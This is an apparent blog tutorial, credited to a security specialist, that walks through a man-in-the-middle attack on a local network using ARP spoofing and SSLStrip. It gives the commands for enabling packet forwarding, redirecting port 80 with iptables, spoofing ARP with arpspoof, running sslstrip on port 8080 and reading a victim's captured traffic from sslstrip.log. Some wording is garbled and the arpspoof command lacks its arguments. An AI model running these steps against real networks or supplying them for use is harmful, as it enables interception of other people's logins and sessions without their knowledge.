MITM attack over SSL Strip HTTPS Link

MITM attack transparently hijacks HTTP traffic on a network with SSLStrip, searches for HTTPS links and redirects and maps these links into similar HTTP connections or comparable HTTPs.

It also supports modes to offer a favicon that looks like a lock icon, selective logging and denial of session.

Step 1: We should set our machine in forwarding modes to enable our machine to forward every packet not intended for your machine.

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Iptables must be set to redirect traffic from port 80 to port 8080.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Step 3: You need to find our network gateway!

route -n

Step 4: We have to find our target host IP address MITM attachment over HTTPS connection with SSLStrip.

Step 5: ARP spoofing is a tactic by which an attacker is sending (spoofed) Address Resolution Protocol (ARP) messages onto a local area network.

arpspoof -i -t

Step 6: Now we have to listen to port 8080, by opening a new terminal window.

sslstrip -l 8080

Step 7: Now we should go to the Victim Machine. For example in the browser, since we know that facebook will go with HTTPS, but now we can check with Victim Machine, we can see a link formed with HTTP.

Step 8: Now go to Home folder and test the sslstrip.log file.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.